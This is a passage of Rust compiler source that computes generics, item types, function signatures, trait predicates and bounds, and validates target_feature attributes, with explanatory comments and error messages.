name: param.name.ident().as_interned_str(),
index: own_start + i as u32,
def_id: tcx.hir.local_def_id(param.id),
pure_wrt_drop: param.pure_wrt_drop,
kind: ty::GenericParamDefKind::Lifetime,
}),
);
let hir_id = tcx.hir.node_to_hir_id(node_id);
let object_lifetime_defaults = tcx.object_lifetime_defaults(hir_id);
// Now create the real type parameters.
let type_start = own_start - has_self as u32 + params.len() as u32;
let mut i = 0;
params.extend(
ast_generics
.params
.iter()
.filter_map(|param| match param.kind {
GenericParamKind::Type {
ref default,
synthetic,
..
} => {
if param.name.ident().name == keywords::SelfType.name() {
span_bug!(
param.span,
"`Self` should not be the name of a regular parameter"
);
}
if !allow_defaults && default.is_some() {
if !tcx.features().default_type_parameter_fallback {
tcx.lint_node(
lint::builtin::INVALID_TYPE_PARAM_DEFAULT,
param.id,
param.span,
&format!(
"defaults for type parameters are only allowed in \
`struct`, `enum`, `type`, or `trait` definitions."
),
);
}
}
let ty_param = ty::GenericParamDef {
index: type_start + i as u32,
name: param.name.ident().as_interned_str(),
def_id: tcx.hir.local_def_id(param.id),
pure_wrt_drop: param.pure_wrt_drop,
kind: ty::GenericParamDefKind::Type {
has_default: default.is_some(),
object_lifetime_default: object_lifetime_defaults
.as_ref()
.map_or(rl::Set1::Empty, |o| o[i]),
synthetic,
},
};
i += 1;
Some(ty_param)
}
_ => None,
}),
);
// provide junk type parameter defs - the only place that
// cares about anything but the length is instantiation,
// and we don't do that for closures.
if let Node::Expr(&hir::Expr {
node: hir::ExprKind::Closure(.., gen),
..
}) = node
{
let dummy_args = if gen.is_some() {
&["<yield_ty>", "<return_ty>", "<witness>"][..]
} else {
&["<closure_kind>", "<closure_signature>"][..]
};
params.extend(
dummy_args
.iter()
.enumerate()
.map(|(i, &arg)| ty::GenericParamDef {
index: type_start + i as u32,
name: Symbol::intern(arg).as_interned_str(),
def_id,
pure_wrt_drop: false,
kind: ty::GenericParamDefKind::Type {
has_default: false,
object_lifetime_default: rl::Set1::Empty,
synthetic: None,
},
}),
);
tcx.with_freevars(node_id, |fv| {
params.extend(fv.iter().zip((dummy_args.len() as u32)..).map(|(_, i)| {
ty::GenericParamDef {
index: type_start + i,
name: Symbol::intern("<upvar>").as_interned_str(),
def_id,
pure_wrt_drop: false,
kind: ty::GenericParamDefKind::Type {
has_default: false,
object_lifetime_default: rl::Set1::Empty,
synthetic: None,
},
}
}));
});
}
let param_def_id_to_index = params
.iter()
.map(|param| (param.def_id, param.index))
.collect();
tcx.alloc_generics(ty::Generics {
parent: parent_def_id,
parent_count,
params,
param_def_id_to_index,
has_self: has_self || parent_has_self,
has_late_bound_regions: has_late_bound_regions(tcx, node),
})
}
fn report_assoc_ty_on_inherent_impl<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, span: Span) {
span_err!(
tcx.sess,
span,
E0202,
"associated types are not allowed in inherent impls"
);
}
fn type_of<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> Ty<'tcx> {
use rustc::hir::*;
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let icx = ItemCtxt::new(tcx, def_id);
match tcx.hir.get(node_id) {
Node::TraitItem(item) => match item.node {
TraitItemKind::Method(..) => {
let substs = Substs::identity_for_item(tcx, def_id);
tcx.mk_fn_def(def_id, substs)
}
TraitItemKind::Const(ref ty, _) | TraitItemKind::Type(_, Some(ref ty)) => icx.to_ty(ty),
TraitItemKind::Type(_, None) => {
span_bug!(item.span, "associated type missing default");
}
},
Node::ImplItem(item) => match item.node {
ImplItemKind::Method(..) => {
let substs = Substs::identity_for_item(tcx, def_id);
tcx.mk_fn_def(def_id, substs)
}
ImplItemKind::Const(ref ty, _) => icx.to_ty(ty),
ImplItemKind::Existential(_) => {
if tcx
.impl_trait_ref(tcx.hir.get_parent_did(node_id))
.is_none()
{
report_assoc_ty_on_inherent_impl(tcx, item.span);
}
find_existential_constraints(tcx, def_id)
}
ImplItemKind::Type(ref ty) => {
if tcx
.impl_trait_ref(tcx.hir.get_parent_did(node_id))
.is_none()
{
report_assoc_ty_on_inherent_impl(tcx, item.span);
}
icx.to_ty(ty)
}
},
Node::Item(item) => {
match item.node {
ItemKind::Static(ref t, ..)
| ItemKind::Const(ref t, _)
| ItemKind::Ty(ref t, _)
| ItemKind::Impl(.., ref t, _) => icx.to_ty(t),
ItemKind::Fn(..) => {
let substs = Substs::identity_for_item(tcx, def_id);
tcx.mk_fn_def(def_id, substs)
}
ItemKind::Enum(..) | ItemKind::Struct(..) | ItemKind::Union(..) => {
let def = tcx.adt_def(def_id);
let substs = Substs::identity_for_item(tcx, def_id);
tcx.mk_adt(def, substs)
}
ItemKind::Existential(hir::ExistTy {
impl_trait_fn: None,
..
}) => find_existential_constraints(tcx, def_id),
// existential types desugared from impl Trait
ItemKind::Existential(hir::ExistTy {
impl_trait_fn: Some(owner),
..
}) => {
tcx.typeck_tables_of(owner)
.concrete_existential_types
.get(&def_id)
.cloned()
.unwrap_or_else(|| {
// This can occur if some error in the
// owner fn prevented us from populating
// the `concrete_existential_types` table.
tcx.sess.delay_span_bug(
DUMMY_SP,
&format!(
"owner {:?} has no existential type for {:?} in its tables",
owner, def_id,
),
);
tcx.types.err
})
}
ItemKind::Trait(..)
| ItemKind::TraitAlias(..)
| ItemKind::Mod(..)
| ItemKind::ForeignMod(..)
| ItemKind::GlobalAsm(..)
| ItemKind::ExternCrate(..)
| ItemKind::Use(..) => {
span_bug!(
item.span,
"compute_type_of_item: unexpected item type: {:?}",
item.node
);
}
}
}
Node::ForeignItem(foreign_item) => match foreign_item.node {
ForeignItemKind::Fn(..) => {
let substs = Substs::identity_for_item(tcx, def_id);
tcx.mk_fn_def(def_id, substs)
}
ForeignItemKind::Static(ref t, _) => icx.to_ty(t),
ForeignItemKind::Type => tcx.mk_foreign(def_id),
},
Node::StructCtor(&ref def)
| Node::Variant(&Spanned {
node: hir::VariantKind { data: ref def, .. },
..
}) => match *def {
VariantData::Unit(..) | VariantData::Struct(..) => {
tcx.type_of(tcx.hir.get_parent_did(node_id))
}
VariantData::Tuple(..) => {
let substs = Substs::identity_for_item(tcx, def_id);
tcx.mk_fn_def(def_id, substs)
}
},
Node::Field(field) => icx.to_ty(&field.ty),
Node::Expr(&hir::Expr {
node: hir::ExprKind::Closure(.., gen),
..
}) => {
if gen.is_some() {
let hir_id = tcx.hir.node_to_hir_id(node_id);
return tcx.typeck_tables_of(def_id).node_id_to_type(hir_id);
}
let substs = ty::ClosureSubsts {
substs: Substs::identity_for_item(tcx, def_id),
};
tcx.mk_closure(def_id, substs)
}
Node::AnonConst(_) => match tcx.hir.get(tcx.hir.get_parent_node(node_id)) {
Node::Ty(&hir::Ty {
node: hir::TyKind::Array(_, ref constant),
..
})
| Node::Ty(&hir::Ty {
node: hir::TyKind::Typeof(ref constant),
..
})
| Node::Expr(&hir::Expr {
node: ExprKind::Repeat(_, ref constant),
..
}) if constant.id == node_id =>
{
tcx.types.usize
}
Node::Variant(&Spanned {
node:
VariantKind {
disr_expr: Some(ref e),
..
},
..
}) if e.id == node_id =>
{
tcx.adt_def(tcx.hir.get_parent_did(node_id))
.repr
.discr_type()
.to_ty(tcx)
}
x => {
bug!("unexpected const parent in type_of_def_id(): {:?}", x);
}
},
Node::GenericParam(param) => match param.kind {
hir::GenericParamKind::Type {
default: Some(ref ty),
..
} => icx.to_ty(ty),
_ => bug!("unexpected non-type NodeGenericParam"),
},
x => {
bug!("unexpected sort of node in type_of_def_id(): {:?}", x);
}
}
}
fn find_existential_constraints<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
) -> ty::Ty<'tcx> {
use rustc::hir::*;
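// Illustrative example: for `existential type Foo: Debug;`, every item in
// the defining scope that constrains `Foo` must infer the same concrete
// type; two different concrete types trigger the mismatch error below.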
struct ConstraintLocator<'a, 'tcx: 'a> {
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
found: Option<(Span, ty::Ty<'tcx>)>,
}
impl<'a, 'tcx> ConstraintLocator<'a, 'tcx> {
fn check(&mut self, def_id: DefId) {
trace!("checking {:?}", def_id);
// don't try to check items that cannot possibly constrain the type
if !self.tcx.has_typeck_tables(def_id) {
trace!("no typeck tables for {:?}", def_id);
return;
}
let ty = self
.tcx
.typeck_tables_of(def_id)
.concrete_existential_types
.get(&self.def_id)
.cloned();
if let Some(ty) = ty {
// FIXME(oli-obk): trace the actual span from inference to improve errors
let span = self.tcx.def_span(def_id);
if let Some((prev_span, prev_ty)) = self.found {
if ty != prev_ty {
// found different concrete types for the existential type
let mut err = self.tcx.sess.struct_span_err(
span,
"defining existential type use differs from previous",
);
err.span_note(prev_span, "previous use here");
err.emit();
}
} else {
self.found = Some((span, ty));
}
}
}
}
impl<'a, 'tcx> intravisit::Visitor<'tcx> for ConstraintLocator<'a, 'tcx> {
fn nested_visit_map<'this>(&'this mut self) -> intravisit::NestedVisitorMap<'this, 'tcx> {
intravisit::NestedVisitorMap::All(&self.tcx.hir)
}
fn visit_item(&mut self, it: &'tcx Item) {
let def_id = self.tcx.hir.local_def_id(it.id);
// the existential type itself or its children are not within its reveal scope
if def_id != self.def_id {
self.check(def_id);
intravisit::walk_item(self, it);
}
}
fn visit_impl_item(&mut self, it: &'tcx ImplItem) {
let def_id = self.tcx.hir.local_def_id(it.id);
// the existential type itself or its children are not within its reveal scope
if def_id != self.def_id {
self.check(def_id);
intravisit::walk_impl_item(self, it);
}
}
fn visit_trait_item(&mut self, it: &'tcx TraitItem) {
let def_id = self.tcx.hir.local_def_id(it.id);
self.check(def_id);
intravisit::walk_trait_item(self, it);
}
}
let mut locator = ConstraintLocator {
def_id,
tcx,
found: None,
};
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let parent = tcx.hir.get_parent(node_id);
trace!("parent_id: {:?}", parent);
if parent == ast::CRATE_NODE_ID {
intravisit::walk_crate(&mut locator, tcx.hir.krate());
} else {
trace!("parent: {:?}", tcx.hir.get(parent));
match tcx.hir.get(parent) {
Node::Item(ref it) => intravisit::walk_item(&mut locator, it),
Node::ImplItem(ref it) => intravisit::walk_impl_item(&mut locator, it),
Node::TraitItem(ref it) => intravisit::walk_trait_item(&mut locator, it),
other => bug!(
"{:?} is not a valid parent of an existential type item",
other
),
}
}
match locator.found {
Some((_, ty)) => ty,
None => {
let span = tcx.def_span(def_id);
tcx.sess.span_err(span, "could not find defining uses");
tcx.types.err
}
}
}
fn fn_sig<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> ty::PolyFnSig<'tcx> {
use rustc::hir::*;
use rustc::hir::Node::*;
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let icx = ItemCtxt::new(tcx, def_id);
match tcx.hir.get(node_id) {
TraitItem(hir::TraitItem {
node: TraitItemKind::Method(sig, _),
..
})
| ImplItem(hir::ImplItem {
node: ImplItemKind::Method(sig, _),
..
}) => AstConv::ty_of_fn(&icx, sig.header.unsafety, sig.header.abi, &sig.decl),
Item(hir::Item {
node: ItemKind::Fn(decl, header, _, _),
..
}) => AstConv::ty_of_fn(&icx, header.unsafety, header.abi, decl),
ForeignItem(&hir::ForeignItem {
node: ForeignItemKind::Fn(ref fn_decl, _, _),
..
}) => {
let abi = tcx.hir.get_foreign_abi(node_id);
compute_sig_of_foreign_fn_decl(tcx, def_id, fn_decl, abi)
}
StructCtor(&VariantData::Tuple(ref fields, _))
| Variant(&Spanned {
node:
hir::VariantKind {
data: VariantData::Tuple(ref fields, _),
..
},
..
}) => {
let ty = tcx.type_of(tcx.hir.get_parent_did(node_id));
let inputs = fields
.iter()
.map(|f| tcx.type_of(tcx.hir.local_def_id(f.id)));
ty::Binder::bind(tcx.mk_fn_sig(
inputs,
ty,
false,
hir::Unsafety::Normal,
abi::Abi::Rust,
))
}
Expr(&hir::Expr {
node: hir::ExprKind::Closure(..),
..
}) => {
// Closure signatures are not like other function
// signatures and cannot be accessed through `fn_sig`. For
// example, a closure signature excludes the `self`
// argument. In any case they are embedded within the
// closure type as part of the `ClosureSubsts`.
//
// To get
// the signature of a closure, you should use the
// `closure_sig` method on the `ClosureSubsts`:
//
// closure_substs.closure_sig(def_id, tcx)
//
// or, inside of an inference context, you can use
//
// infcx.closure_sig(def_id, closure_substs)
bug!("to get the signature of a closure, use `closure_sig()` not `fn_sig()`");
}
x => {
bug!("unexpected sort of node in fn_sig(): {:?}", x);
}
}
}
fn impl_trait_ref<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
) -> Option<ty::TraitRef<'tcx>> {
let icx = ItemCtxt::new(tcx, def_id);
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
match tcx.hir.expect_item(node_id).node {
hir::ItemKind::Impl(.., ref opt_trait_ref, _, _) => {
opt_trait_ref.as_ref().map(|ast_trait_ref| {
let selfty = tcx.type_of(def_id);
AstConv::instantiate_mono_trait_ref(&icx, ast_trait_ref, selfty)
})
}
_ => bug!(),
}
}
fn impl_polarity<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> hir::ImplPolarity {
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
match tcx.hir.expect_item(node_id).node {
hir::ItemKind::Impl(_, polarity, ..) => polarity,
ref item => bug!("impl_polarity: {:?} not an impl", item),
}
}
// Is it marked with ?Sized
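// Illustrative example: `T: ?Sized` relaxes the implicit `Sized` bound;
// writing the relaxed bound twice, e.g. `T: ?Sized + ?Sized`, emits E0203.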
fn is_unsized<'gcx: 'tcx, 'tcx>(
astconv: &dyn AstConv<'gcx, 'tcx>,
ast_bounds: &[hir::GenericBound],
span: Span,
) -> bool {
let tcx = astconv.tcx();
// Try to find an unbound in bounds.
let mut unbound = None;
for ab in ast_bounds {
if let &hir::GenericBound::Trait(ref ptr, hir::TraitBoundModifier::Maybe) = ab {
if unbound.is_none() {
unbound = Some(ptr.trait_ref.clone());
} else {
span_err!(
tcx.sess,
span,
E0203,
"type parameter has more than one relaxed default \
bound, only one is supported"
);
}
}
}
let kind_id = tcx.lang_items().require(SizedTraitLangItem);
match unbound {
Some(ref tpb) => {
// FIXME(#8559) currently requires the unbound to be built-in.
if let Ok(kind_id) = kind_id {
if tpb.path.def != Def::Trait(kind_id) {
tcx.sess.span_warn(
span,
"default bound relaxed for a type parameter, but \
this does nothing because the given bound is not \
a default. Only `?Sized` is supported",
);
}
}
}
_ if kind_id.is_ok() => {
return false;
}
// No lang item for Sized, so we can't add it as a bound.
None => {}
}
true
}
/// Returns the early-bound lifetimes declared in this generics
/// listing. For anything other than fns/methods, this is just all
/// the lifetimes that are declared. For fns or methods, we have to
/// screen out those that do not appear in any where-clauses etc., using
/// `resolve_lifetime::early_bound_lifetimes`.
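/// For example (illustrative), in `fn f<'a, 'b>(x: &'a u32) where 'a: 'b`
/// both lifetimes appear in a where-clause and are early-bound, while the
/// `'c` in `fn g<'c>(x: &'c u32)` is late-bound and filtered out here.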
fn early_bound_lifetimes_from_generics<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
generics: &'a hir::Generics,
) -> impl Iterator<Item = &'a hir::GenericParam> + Captures<'tcx> {
generics
.params
.iter()
.filter(move |param| match param.kind {
GenericParamKind::Lifetime { .. } => {
let hir_id = tcx.hir.node_to_hir_id(param.id);
!tcx.is_late_bound(hir_id)
}
_ => false,
})
}
fn predicates_defined_on<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
) -> ty::GenericPredicates<'tcx> {
let explicit = tcx.explicit_predicates_of(def_id);
let predicates = if tcx.sess.features_untracked().infer_outlives_requirements {
[
&explicit.predicates[..],
&tcx.inferred_outlives_of(def_id)[..],
].concat()
} else {
explicit.predicates
};
ty::GenericPredicates {
parent: explicit.parent,
predicates,
}
}
fn predicates_of<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
) -> ty::GenericPredicates<'tcx> {
let ty::GenericPredicates {
parent,
mut predicates,
} = tcx.predicates_defined_on(def_id);
if tcx.is_trait(def_id) {
// For traits, add `Self: Trait` predicate. This is
// not part of the predicates that a user writes, but it
// is something that one must prove in order to invoke a
// method or project an associated type.
//
// In the chalk setup, this predicate is not part of the
// "predicates" for a trait item. But it is useful in
// rustc because if you directly (e.g.) invoke a trait
// method like `Trait::method(...)`, you must naturally
// prove that the trait applies to the types that were
// used, and adding the predicate into this list ensures
// that this is done.
predicates.push(ty::TraitRef::identity(tcx, def_id).to_predicate());
}
ty::GenericPredicates { parent, predicates }
}
fn explicit_predicates_of<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
) -> ty::GenericPredicates<'tcx> {
use rustc::hir::*;
debug!("explicit_predicates_of(def_id={:?})", def_id);
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let node = tcx.hir.get(node_id);
let mut is_trait = None;
let mut is_default_impl_trait = None;
let icx = ItemCtxt::new(tcx, def_id);
let no_generics = hir::Generics::empty();
let mut predicates = vec![];
let ast_generics = match node {
Node::TraitItem(item) => &item.generics,
Node::ImplItem(item) => match item.node {
ImplItemKind::Existential(ref bounds) => {
let substs = Substs::identity_for_item(tcx, def_id);
let anon_ty = tcx.mk_anon(def_id, substs);
// Collect the bounds, i.e. the `A+B+'c` in `impl A+B+'c`.
let bounds = compute_bounds(
&icx,
anon_ty,
bounds,
SizedByDefault::Yes,
tcx.def_span(def_id),
);
predicates.extend(bounds.predicates(tcx, anon_ty));
&item.generics
}
_ => &item.generics,
},
Node::Item(item) => {
match item.node {
ItemKind::Impl(_, _, defaultness, ref generics, ..) => {
if defaultness.is_default() {
is_default_impl_trait = tcx.impl_trait_ref(def_id);
}
generics
}
ItemKind::Fn(.., ref generics, _)
| ItemKind::Ty(_, ref generics)
| ItemKind::Enum(_, ref generics)
| ItemKind::Struct(_, ref generics)
| ItemKind::Union(_, ref generics) => generics,
ItemKind::Trait(_, _, ref generics, .., ref items) => {
is_trait = Some((ty::TraitRef::identity(tcx, def_id), items));
generics
}
ItemKind::Existential(ExistTy {
ref bounds,
impl_trait_fn,
ref generics,
}) => {
let substs = Substs::identity_for_item(tcx, def_id);
let anon_ty = tcx.mk_anon(def_id, substs);
// Collect the bounds, i.e. the `A+B+'c` in `impl A+B+'c`.
let bounds = compute_bounds(
&icx,
anon_ty,
bounds,
SizedByDefault::Yes,
tcx.def_span(def_id),
);
if impl_trait_fn.is_some() {
// impl Trait
return ty::GenericPredicates {
parent: None,
predicates: bounds.predicates(tcx, anon_ty),
};
} else {
// named existential types
predicates.extend(bounds.predicates(tcx, anon_ty));
generics
}
}
_ => &no_generics,
}
}
Node::ForeignItem(item) => match item.node {
ForeignItemKind::Static(..) => &no_generics,
ForeignItemKind::Fn(_, _, ref generics) => generics,
ForeignItemKind::Type => &no_generics,
},
_ => &no_generics,
};
let generics = tcx.generics_of(def_id);
let parent_count = generics.parent_count as u32;
let has_own_self = generics.has_self && parent_count == 0;
// Below we'll consider the bounds on the type parameters (including `Self`)
// and the explicit where-clauses, but to get the full set of predicates
// on a trait we need to add in the supertrait bounds and bounds found on
// associated types.
if let Some((_trait_ref, _)) = is_trait {
predicates = tcx.super_predicates_of(def_id).predicates;
}
// In default impls, we can assume that the self type implements
// the trait. So in:
//
// default impl Foo for Bar { .. }
//
// we add a default where clause `Bar: Foo`. We do a similar thing for traits
// (see below). Recall that a default impl is not itself an impl, but rather a
// set of defaults that can be incorporated into another impl.
if let Some(trait_ref) = is_default_impl_trait {
predicates.push(trait_ref.to_poly_trait_ref().to_predicate());
}
// Collect the region predicates that were declared inline as
// well. In the case of parameters declared on a fn or method, we
// have to be careful to only iterate over early-bound regions.
let mut index = parent_count + has_own_self as u32;
for param in early_bound_lifetimes_from_generics(tcx, ast_generics) {
let region = tcx.mk_region(ty::ReEarlyBound(ty::EarlyBoundRegion {
def_id: tcx.hir.local_def_id(param.id),
index,
name: param.name.ident().as_interned_str(),
}));
index += 1;
match param.kind {
GenericParamKind::Lifetime { .. } => {
param.bounds.iter().for_each(|bound| match bound {
hir::GenericBound::Outlives(lt) => {
let bound = AstConv::ast_region_to_region(&icx, &lt, None);
let outlives = ty::Binder::bind(ty::OutlivesPredicate(region, bound));
predicates.push(outlives.to_predicate());
}
_ => bug!(),
});
}
_ => bug!(),
}
}
// Collect the predicates that were written inline by the user on each
// type parameter (e.g., `<T:Foo>`).
for param in &ast_generics.params {
match param.kind {
GenericParamKind::Type { .. } => {
let name = param.name.ident().as_interned_str();
let param_ty = ty::ParamTy::new(index, name).to_ty(tcx);
index += 1;
let sized = SizedByDefault::Yes;
let bounds = compute_bounds(&icx, param_ty, &param.bounds, sized, param.span);
predicates.extend(bounds.predicates(tcx, param_ty));
}
_ => {}
}
}
// Add in the bounds that appear in the where-clause
let where_clause = &ast_generics.where_clause;
for predicate in &where_clause.predicates {
match predicate {
&hir::WherePredicate::BoundPredicate(ref bound_pred) => {
let ty = icx.to_ty(&bound_pred.bounded_ty);
// Keep the type around in a WF predicate, in case of no bounds.
// That way, `where Ty:` is not a complete noop (see #53696).
if bound_pred.bounds.is_empty() {
if let ty::Param(_) = ty.sty {
// This is a `where T:`, which can be in the HIR from the
// transformation that moves `?Sized` to `T`'s declaration.
// We can skip the predicate because type parameters are
// trivially WF, but also we *should*, to avoid exposing
// users who never wrote `where Type:,` themselves, to
// compiler/tooling bugs from not handling WF predicates.
} else {
predicates.push(ty::Predicate::WellFormed(ty));
}
}
for bound in bound_pred.bounds.iter() {
match bound {
&hir::GenericBound::Trait(ref poly_trait_ref, _) => {
let mut projections = Vec::new();
let trait_ref = AstConv::instantiate_poly_trait_ref(
&icx,
poly_trait_ref,
ty,
&mut projections,
);
predicates.push(trait_ref.to_predicate());
predicates.extend(projections.iter().map(|p| p.to_predicate()));
}
&hir::GenericBound::Outlives(ref lifetime) => {
let region = AstConv::ast_region_to_region(&icx, lifetime, None);
let pred = ty::Binder::bind(ty::OutlivesPredicate(ty, region));
predicates.push(ty::Predicate::TypeOutlives(pred))
}
}
}
}
&hir::WherePredicate::RegionPredicate(ref region_pred) => {
let r1 = AstConv::ast_region_to_region(&icx, &region_pred.lifetime, None);
for bound in &region_pred.bounds {
let r2 = match bound {
hir::GenericBound::Outlives(lt) => {
AstConv::ast_region_to_region(&icx, lt, None)
}
_ => bug!(),
};
let pred = ty::Binder::bind(ty::OutlivesPredicate(r1, r2));
predicates.push(ty::Predicate::RegionOutlives(pred))
}
}
&hir::WherePredicate::EqPredicate(..) => {
// FIXME(#20041)
}
}
}
// Add predicates from associated type bounds.
if let Some((self_trait_ref, trait_items)) = is_trait {
predicates.extend(trait_items.iter().flat_map(|trait_item_ref| {
let trait_item = tcx.hir.trait_item(trait_item_ref.id);
let bounds = match trait_item.node {
hir::TraitItemKind::Type(ref bounds, _) => bounds,
_ => {
return vec![].into_iter();
}
};
let assoc_ty =
tcx.mk_projection(tcx.hir.local_def_id(trait_item.id), self_trait_ref.substs);
let bounds = compute_bounds(
&ItemCtxt::new(tcx, def_id),
assoc_ty,
bounds,
SizedByDefault::Yes,
trait_item.span,
);
bounds.predicates(tcx, assoc_ty).into_iter()
}))
}
// Subtle: before we store the predicates into the tcx, we
// sort them so that predicates like `T: Foo<Item=U>` come
// before uses of `U`. This avoids false ambiguity errors
// in trait checking. See `setup_constraining_predicates`
// for details.
if let Node::Item(&Item {
node: ItemKind::Impl(..),
..
}) = node
{
let self_ty = tcx.type_of(def_id);
let trait_ref = tcx.impl_trait_ref(def_id);
ctp::setup_constraining_predicates(
tcx,
&mut predicates,
trait_ref,
&mut ctp::parameters_for_impl(self_ty, trait_ref),
);
}
ty::GenericPredicates {
parent: generics.parent,
predicates,
}
}
pub enum SizedByDefault {
Yes,
No,
}
/// Translate the AST's notion of ty param bounds (which are an enum consisting of a newtyped Ty or
/// a region) to ty's notion of ty param bounds, which can be either user-defined traits or a
/// built-in trait (formerly known as a "kind"), such as `Send`.
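/// For example (illustrative), `T: Foo<Item = u32> + 'a + ?Sized` yields one
/// trait bound plus a projection bound for `Item`, one region bound, and,
/// via `?Sized`, suppresses the implicit `Sized` bound under
/// `SizedByDefault::Yes`.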
pub fn compute_bounds<'gcx: 'tcx, 'tcx>(
astconv: &dyn AstConv<'gcx, 'tcx>,
param_ty: Ty<'tcx>,
ast_bounds: &[hir::GenericBound],
sized_by_default: SizedByDefault,
span: Span,
) -> Bounds<'tcx> {
let mut region_bounds = vec![];
let mut trait_bounds = vec![];
for ast_bound in ast_bounds {
match *ast_bound {
hir::GenericBound::Trait(ref b, hir::TraitBoundModifier::None) => trait_bounds.push(b),
hir::GenericBound::Trait(_, hir::TraitBoundModifier::Maybe) => {}
hir::GenericBound::Outlives(ref l) => region_bounds.push(l),
}
}
let mut projection_bounds = vec![];
let mut trait_bounds: Vec<_> = trait_bounds
.iter()
.map(|&bound| astconv.instantiate_poly_trait_ref(bound, param_ty, &mut projection_bounds))
.collect();
let region_bounds = region_bounds
.into_iter()
.map(|r| astconv.ast_region_to_region(r, None))
.collect();
trait_bounds.sort_by_key(|t| t.def_id());
let implicitly_sized = if let SizedByDefault::Yes = sized_by_default {
!is_unsized(astconv, ast_bounds, span)
} else {
false
};
Bounds {
region_bounds,
implicitly_sized,
trait_bounds,
projection_bounds,
}
}
/// Converts a specific GenericBound from the AST into a set of
/// predicates that apply to the self-type. A vector is returned
/// because this can be anywhere from 0 predicates (`T:?Sized` adds no
/// predicates) to 1 (`T:Foo`) to many (`T:Bar<X=i32>` adds `T:Bar`
/// and `<T as Bar>::X == i32`).
fn predicates_from_bound<'tcx>(
astconv: &dyn AstConv<'tcx, 'tcx>,
param_ty: Ty<'tcx>,
bound: &hir::GenericBound,
) -> Vec<ty::Predicate<'tcx>> {
match *bound {
hir::GenericBound::Trait(ref tr, hir::TraitBoundModifier::None) => {
let mut projections = Vec::new();
let pred = astconv.instantiate_poly_trait_ref(tr, param_ty, &mut projections);
projections
.into_iter()
.map(|p| p.to_predicate())
.chain(Some(pred.to_predicate()))
.collect()
}
hir::GenericBound::Outlives(ref lifetime) => {
let region = astconv.ast_region_to_region(lifetime, None);
let pred = ty::Binder::bind(ty::OutlivesPredicate(param_ty, region));
vec![ty::Predicate::TypeOutlives(pred)]
}
hir::GenericBound::Trait(_, hir::TraitBoundModifier::Maybe) => vec![],
}
}
fn compute_sig_of_foreign_fn_decl<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
decl: &hir::FnDecl,
abi: abi::Abi,
) -> ty::PolyFnSig<'tcx> {
let unsafety = if abi == abi::Abi::RustIntrinsic {
match &*tcx.item_name(def_id).as_str() {
"size_of" | "min_align_of" => hir::Unsafety::Normal,
_ => hir::Unsafety::Unsafe,
}
} else {
hir::Unsafety::Unsafe
};
let fty = AstConv::ty_of_fn(&ItemCtxt::new(tcx, def_id), unsafety, abi, decl);
// feature gate SIMD types in FFI, since I (huonw) am not sure the
// ABIs are handled at all correctly.
if abi != abi::Abi::RustIntrinsic
&& abi != abi::Abi::PlatformIntrinsic
&& !tcx.features().simd_ffi
{
let check = |ast_ty: &hir::Ty, ty: Ty| {
if ty.is_simd() {
tcx.sess
.struct_span_err(
ast_ty.span,
&format!(
"use of SIMD type `{}` in FFI is highly experimental and \
may result in invalid code",
tcx.hir.node_to_pretty_string(ast_ty.id)
),
)
.help("add #![feature(simd_ffi)] to the crate attributes to enable")
.emit();
}
};
for (input, ty) in decl.inputs.iter().zip(*fty.inputs().skip_binder()) {
check(&input, ty)
}
if let hir::Return(ref ty) = decl.output {
check(&ty, *fty.output().skip_binder())
}
}
fty
}
fn is_foreign_item<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> bool {
match tcx.hir.get_if_local(def_id) {
Some(Node::ForeignItem(..)) => true,
Some(_) => false,
_ => bug!("is_foreign_item applied to non-local def-id {:?}", def_id),
}
}
fn from_target_feature(
tcx: TyCtxt,
id: DefId,
attr: &ast::Attribute,
whitelist: &FxHashMap<String, Option<String>>,
target_features: &mut Vec<Symbol>,
) {
let list = match attr.meta_item_list() {
Some(list) => list,
None => {
let msg = "#[target_feature] attribute must be of the form \
#[target_feature(..)]";
tcx.sess.span_err(attr.span, &msg);
return;
}
};
let rust_features = tcx.features();
for item in list {
// Only `enable = ...` is accepted in the meta item list
if !item.check_name("enable") {
let msg = "#[target_feature(..)] only accepts sub-keys of `enable` \
currently";
tcx.sess.span_err(item.span, &msg);
continue;
}
// Must be of the form `enable = "..."` (a string)
let value = match item.value_str() {
Some(value) => value,
None => {
let msg = "#[target_feature] attribute must be of the form \
#[target_feature(enable = \"..\")]";
tcx.sess.span_err(item.span, &msg);
continue;
}
};
// We allow comma separation to enable multiple features
for feature in value.as_str().split(',') {
// Only allow whitelisted features per platform
let feature_gate = match whitelist.get(feature) {
Some(g) => g,
None => {
let msg = format!(
"the feature named `{}` is not valid for \
this target",
feature
);
let mut err = tcx.sess.struct_span_err(item.span, &msg);
if feature.starts_with("+") {
let valid = whitelist.contains_key(&feature[1..]);
if valid {
err.help("consider removing the leading `+` in the feature name");
}
}
err.emit();
continue;
}
};
// Only allow features whose feature gates have been enabled
let allowed = match feature_gate.as_ref().map(|s| &**s) {
Some("arm_target_feature") => rust_features.arm_target_feature,
Some("aarch64_target_feature") => rust_features.aarch64_target_feature,
Some("hexagon_target_feature") => rust_features.hexagon_target_feature,
Some("powerpc_target_feature") => rust_features.powerpc_target_feature,
Some("mips_target_feature") => rust_features.mips_target_feature,
Some("avx512_target_feature") => rust_features.avx512_target_feature,
